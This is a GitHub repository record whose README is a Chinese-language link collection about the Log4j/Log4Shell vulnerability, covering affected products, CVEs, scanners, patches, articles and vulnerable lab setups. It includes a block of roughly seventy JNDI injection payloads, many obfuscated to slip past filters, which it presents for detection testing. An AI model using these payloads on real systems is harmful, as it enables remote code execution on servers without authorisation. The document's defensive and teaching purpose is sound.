{"id":13844135,"url":"https://github.com/HackJava/Log4j2","last_synced_at":"2025-07-11T22:30:38.037Z","repository":{"id":113139306,"uuid":"436933892","full_name":"HackJava/Log4j2","owner":"HackJava","description":"《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库！Tribute to the most invincible Java logging library in the universe!","archived":false,"fork":false,"pushed_at":"2022-12-27T08:38:50.000Z","size":90,"stargazers_count":192,"open_issues_count":0,"forks_count":66,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-02-11T21:17:36.925Z","etag":null,"topics":["0e0w","cve-2021-44228","goqi","hacklog4j","log4j","log4j2","log4shell"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HackJava.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-12-10T10:11:09.000Z","updated_at":"2024-02-03T11:40:59.000Z","dependencies_parsed_at":"2023-12-12T22:47:17.350Z","dependency_job_id":null,"html_url":"https://github.com/HackJava/Log4j2","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FLog4j2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FLog4j2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FLog4j2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FLog4j2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HackJava","download_url":"https://codeload.github.com/HackJava/Log4j2/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225763252,"owners_count":17520425,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0e0w","cve-2021-44228","goqi","hacklog4j","log4j","log4j2","log4shell"],"created_at":"2024-08-04T17:02:35.628Z","updated_at":"2024-11-21T16:30:36.511Z","avatar_url":"https://github.com/HackJava.png","language":null,"readme":"# HackLog4j-永恒之恶龙\n\n本项目用来致敬全宇宙最无敌的Java日志库！同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新，本项目创建于2021年12月10日，最近的一次更新时间为2022年12月27日。作者：[0e0w](https://github.com/0e0w)\n\n- [00-Log4j永恒恶龙](https://github.com/HackJava/HackLog4j2#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99)\n- [01-Log4j基础知识](https://github.com/HackJava/HackLog4j2#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86)\n- [02-Log4j框架识别](https://github.com/HackJava/HackLog4j2#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB)\n- [03-Log4j上层建筑](https://github.com/HackJava/HackLog4j2#03-log4j%E4%B8%8A%E5%B1%82%E5%BB%BA%E7%AD%91)\n- [04-Log4j漏洞汇总](https://github.com/HackJava/HackLog4j2#04-log4j%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB)\n- [05-Log4j检测利用](https://github.com/HackJava/HackLog4j2#05-log4j%E6%A3%80%E6%B5%8B%E5%88%A9%E7%94%A8)\n- [06-Log4j漏洞修复](https://github.com/HackJava/HackLog4j2#06-log4j%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D)\n- [07-Log4j分析文章](https://github.com/HackJava/HackLog4j2#07-log4j%E5%88%86%E6%9E%90%E6%96%87%E7%AB%A0)\n- [08-Log4j靶场环境](https://github.com/HackJava/HackLog4j2#08-log4j%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83)\n\n## 00-Log4j永恒恶龙\n\n- https://github.com/Goqi/ELong \n\n## 01-Log4j基础知识\n\n- https://github.com/apache/logging-log4j2\n\n## 02-Log4j框架识别\n\n- 待更新\n\n## 03-Log4j上层建筑\n\n**log4j + ？ = rce ！**\n\n- [x] Apache Flink\n- [x] Apache Struts2\n- [ ] Apache Spark\n- [x] Apache Storm\n- [ ] Apache Tomcat\n- [x] Apache Solr\n- [ ] Apache Dubbo\n- [ ] Apache Druid\n- [x] Apache OFBiz\n- [ ] Apache Flume\n- [ ] Redis\n- [ ] Logstash\n- [ ] ElasticSearch\n- [ ] Apache Kafka\n- [ ] Ghidra\n- [ ] Spring-Boot-strater-log4j2\n- [ ] VMware vCenter\n- [ ] Minecraft\n- [x] hikvision\n- ......\n- https://fofa.so/static_pages/log4j2\n- https://github.com/cisagov/log4j-affected-db\n- https://github.com/YfryTchsGD/Log4jAttackSurface\n- https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes\n- https://github.com/CrackerCat/Log4jAttackSurface\n- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages\n- https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html\n- https://github.com/authomize/log4j-log4shell-affected\n- https://github.com/NS-Sp4ce/Vm4J\n- https://github.com/dinosn/hikvision\n\n## 04-Log4j漏洞汇总\n\n- CVE-2021-45105\n- CVE-2021-44228\n- CVE-2021-4104\n- CVE-2019-17571\n- CVE-2017-5645\n\n## 05-Log4j检测利用\n\n如何判断一个网站是否存在Log4j JNDI注入漏洞？如何查找内网中存在Log4j JNDI注入漏洞？\n\n一、Payload\n\n```\n${jndi:ldap://127.0.0.1/poc}\n${jndi:rmi://127.0.0.1/poc}\n${jndi:dns://127.0.0.1/poc}\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}\n${${::-j}ndi:rmi://127.0.0.1/poc}\n${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}\n${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}\n$%7Bjndi:ldap://127.0.0.1/poc%7D\n${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}\n${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}\n${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}\n${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}\n${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}\n${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}\n${jndi:ldap://127.0.0.1#127.0.0.1/poc}\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}\n${${::-j}ndi:rmi://k123.k123.k123/ass}\n${jndi:rmi://k8.k123.k123}\n${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}\nj${loWer:Nd}i${uPper::}\n${jndi:ldaps://127.0.0.1/poc}\n${jndi:iiop://127.0.0.1/poc}\n${date:ldap://127.0.0.1/poc}\n${java:ldap://127.0.0.1/poc}\n${marker:ldap://127.0.0.1/poc}\n${ctx:ldap://127.0.0.1/poc}\n${lower:ldap://127.0.0.1/poc}\n${upper:ldap://127.0.0.1/poc}\n${main:ldap://127.0.0.1/poc}\n${jvmrunargs:ldap://127.0.0.1/poc}\n${sys:ldap://127.0.0.1/poc}\n${env:ldap://127.0.0.1/poc}\n${log4j:ldap://127.0.0.1/poc}\n${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}\n${jndi:rmi://127.0.0.1}/\n${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}\n${jndi:dns://127.0.0.1}\n${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}\n${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}\n${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}\n${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}\n${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}\n${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}\n${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}\n${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc\n${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}\n${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}\n${jnd${upper:i}:ldap://127.0.0.1/poc}\n${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}\n${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}\n${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}\n${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}\n${${::-j}ndi:rmi://127.0.0.1/poc}\n${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}\n${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}\n${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}\n${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}\n${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}\n${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}\n${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}\n${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}\n```\n\n- https://github.com/trickest/log4j\n- https://github.com/test502git/log4j-fuzz-head-poc\n- https://github.com/woodpecker-appstore/log4j-payload-generator\n- https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words\n\n二、源码检测\n\n- https://github.com/google/log4jscanner\n- https://github.com/hupe1980/scan4log4shell\n- https://github.com/logpresso/CVE-2021-44228-Scanner\n- https://github.com/xsultan/log4jshield\n- https://github.com/Joefreedy/Log4j-Windows-Scanner\n- https://github.com/back2root/log4shell-rex\n- https://github.com/Neo23x0/log4shell-detector\n- https://github.com/dwisiswant0/look4jar\n- https://github.com/Qualys/log4jscanwin\n- https://github.com/lijiejie/log4j2_vul_local_scanner\n- https://github.com/palantir/log4j-sniffer\n- https://github.com/mergebase/log4j-detector\n- https://www.t00ls.cc/thread-63931-1-1.html\n- https://github.com/darkarnium/Log4j-CVE-Detect\n- https://github.com/whitesource/log4j-detect-distribution\n- https://github.com/fox-it/log4j-finder\n- https://github.com/webraybtl/Log4j\n\n三、出网检测\n\n- https://github.com/dorkerdevil/Log-4-JAM\n- https://github.com/adilsoybali/Log4j-RCE-Scanner\n- https://github.com/cisagov/log4j-scanner\n\n四、不出网检测\n\n- https://github.com/For-ACGN/Log4Shell\n- https://github.com/proferosec/log4jScanner\n- https://github.com/Y0-kan/Log4jShell-Scan\n- https://github.com/j5s/Log4j2Scan\n- https://github.com/EmYiQing/JNDIScan\n\n五、主动扫描\n\n- https://github.com/ilsubyeega/log4j2-exploits\n- https://github.com/Cyronlee/log4j-rce\n- https://github.com/handbye/Log4j2Fuzz\n\n六、被动扫描\n\n- https://github.com/silentsignal/burp-log4shell\n- https://github.com/pmiaowu/log4jScan\n- https://github.com/guguyu1/log4j2_burp_scan\n- https://github.com/whwlsfb/Log4j2Scan\n- https://github.com/bigsizeme/Log4j-check\n- https://github.com/f0ng/log4j2burpscanner\n- https://github.com/pmiaowu/log4j2Scan\n- https://github.com/bit4woo/log4jScan\n- https://github.com/izj007/Log4j2Scan\n- https://github.com/gh0stkey/Log4j2-RCE-Scanner\n- https://github.com/p1n93r/Log4j2Scan\n- https://github.com/mostwantedduck/BurpLog4j2Scan\n- https://github.com/j3ers3/Log4Scan\n\n七、Header检测\n\n- https://github.com/fullhunt/log4j-scan\n- https://github.com/0xInfection/LogMePwn\n- https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit\n\n八、请求参数检测\n\n九、其他工具\n\n- https://github.com/dbgee/log4j2_rce\n- https://github.com/ReadER-L/log4j-rce\n- https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept\n- https://github.com/Seayon/Log4j2RCE_Demo\n- https://github.com/elbosso/Log4J2CustomJMXAppender\n- https://github.com/ahus1/logging-and-tracing\n- https://github.com/stuartwdouglas/log4j-jndi-agent\n- https://github.com/xiajun325/apache-log4j-rce-poc\n- https://github.com/caoli5288/log4j2jndiinterceptor\n- https://github.com/y35uishere/Log4j2-CVE-2021-44228\n- https://github.com/ErdbeerbaerLP/log4jfix\n- https://github.com/0x0021h/apache-log4j-rce\n- https://github.com/Gav06/RceFix\n- https://github.com/UltraVanilla/LogJackFix\n- https://github.com/iamsino/log4j2-Exp\n- https://github.com/bkfish/Apache-Log4j-Learning\n- https://github.com/LoliKingdom/NukeJndiLookupFromLog4j\n- https://github.com/tangxiaofeng7/apache-log4j-poc\n- https://github.com/h1b1ki/apache-log4j-poc\n- https://github.com/EmptyIrony/Log4j2Fixer\n- https://github.com/AzisabaNetwork/Log4j2Fix\n- https://github.com/apple502j/Log4Jail\n- https://github.com/jacobtread/L4J-Vuln-Patch\n- https://github.com/stardust1900/log4j-2.15.0\n- https://github.com/nest-x/nestx-log4js\n- https://github.com/Marcelektro/Log4J-RCE-Implementation\n- https://github.com/jdremillard/json-logging\n- https://github.com/parayaluyanta/sell-logs-and-peace\n- https://github.com/albar965/atools\n- https://github.com/Al0sc/Log4j-rce\n- https://github.com/ven0n1/Log4jv2Maven\n- https://github.com/akunzai/log4j2-sendgrid-appender\n- https://github.com/inbug-team/Log4j_RCE_Tool\n- https://github.com/zlepper/CVE-2021-44228-Test-Server\n- https://github.com/webraybtl/Log4j\n- https://github.com/numanturle/Log4jNuclei\n- https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\n- https://github.com/kozmer/log4j-shell-poc\n- https://github.com/hackerhackrat/Log4j2-RCE-burp-plugin\n- https://github.com/mzlogin/CVE-2021-44228-Demo\n- https://github.com/greymd/CVE-2021-44228\n- https://github.com/Cybereason/Logout4Shell\n- https://github.com/webraybtl/log4j-snort\n- https://github.com/corretto/hotpatch-for-apache-log4j2\n- https://github.com/alexandre-lavoie/python-log4rce\n- https://github.com/hillu/local-log4j-vuln-scanner\n- https://github.com/leonjza/log4jpwn\n- https://github.com/cyberstruggle/L4sh\n- https://github.com/cckuailong/log4shell_1.x\n- https://github.com/zhzyker/logmap\n- https://github.com/LoRexxar/log_dependency_checklist\n- https://github.com/0xDexter0us/Log4J-Scanner\n- https://github.com/cckuailong/Log4j_CVE-2021-45046\n- https://github.com/KpLi0rn/Log4j2Scan\n- https://github.com/righel/log4shell_nse\n- https://github.com/Ch0pin/log4JFrida\n- https://github.com/mycve/HTTPHeaderInjectBrowser\n- https://github.com/ihebski/log4j-Scanner\n- https://github.com/Yihsiwei/Log4j-exp\n- https://github.com/rz7d/log4j-force-upgrader\n- https://github.com/xsser/log4jdemoforRCE\n- https://github.com/e5g/Log-4J-Exploit-Fix\n- https://github.com/Re1own/Apache-log4j-POC\n- https://github.com/jas502n/Log4j2-CVE-2021-44228\n- https://github.com/ChloePrime/fix4log4j\n- https://github.com/toString122/log4j2_exp\n- https://github.com/shanfenglan/apache_log4j_poc\n- https://github.com/dbgee/CVE-2021-44228\n- https://github.com/lcosmos/apache-log4j-poc\n- https://github.com/dbgee/CVE-2021-44228\n- https://github.com/lcosmos/apache-log4j-poc\n- https://github.com/aalex954/Log4PowerShell\n- https://github.com/fox-it/log4shell-pcaps\n- https://github.com/Qerim-iseni09/ByeLog4Shell\n\n## 06-Log4j漏洞修复\n\n- https://github.com/360-CERT/Log4ShellPatch\n- https://github.com/javasec/log4j-patch\n- https://github.com/simonis/Log4jPatch\n- https://github.com/FrankHeijden/Log4jFix\n- https://github.com/Szczurowsky/Log4j-0Day-Fix\n- https://github.com/SumoLogic/sumologic-log4j2-appender\n- https://github.com/chaitin/log4j2-vaccine\n- https://github.com/zhangyoufu/log4j2-without-jndi\n- https://github.com/CreeperHost/Log4jPatcher\n- https://github.com/boundaryx/cloudrasp-log4j2\n- https://github.com/DichuuCraft/LOG4J2-3201-fix\n- https://github.com/DichuuCraft/LOG4J2-3201-fix\n\n## 07-Log4j分析文章\n\n- https://mp.weixin.qq.com/s/4cvooT4tfQhjL7t4GFzYFQ\n- https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ\n- https://mp.weixin.qq.com/s/nOmQFq4KxM9AZ_HYIq1_CQ\n- https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg\n- https://mp.weixin.qq.com/s/AWhV-QdkQ6i2IEZSVhe-Kg\n- https://mp.weixin.qq.com/s/iHqwL6jslyCV_0jtdVj82A\n- https://lorexxar.cn/2021/12/10/log4j2-jndi\n- https://www.t00ls.cc/thread-63705-1-1.html\n- https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg\n\n## 08-Log4j靶场环境\n\n- https://hub.docker.com/u/vulfocus\n- https://github.com/jweny/log4j-web-env\n- https://github.com/fengxuangit/log4j_vuln\n- https://www.t00ls.cc/thread-63695-1-1.html\n- https://github.com/christophetd/log4shell-vulnerable-app\n- https://github.com/Adikso/minecraft-log4j-honeypot\n- https://github.com/try777-try777/reVul-apache-log4j2-rec\n- https://github.com/EmYiQing/Log4j2DoS\n- https://github.com/tothi/log4shell-vulnerable-app\n- https://github.com/Anonymous-ghost/log4jVul\n- https://github.com/cyberxml/log4j-poc\n\n![](TEMP/wx.png)\n\n[![Stargazers over time](https://starchart.cc//0e0w/HackLog4j.svg)](https://starchart.cc/0e0w/HackLog4j)","funding_links":[],"categories":["Others"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHackJava%2FLog4j2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHackJava%2FLog4j2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHackJava%2FLog4j2/lists"}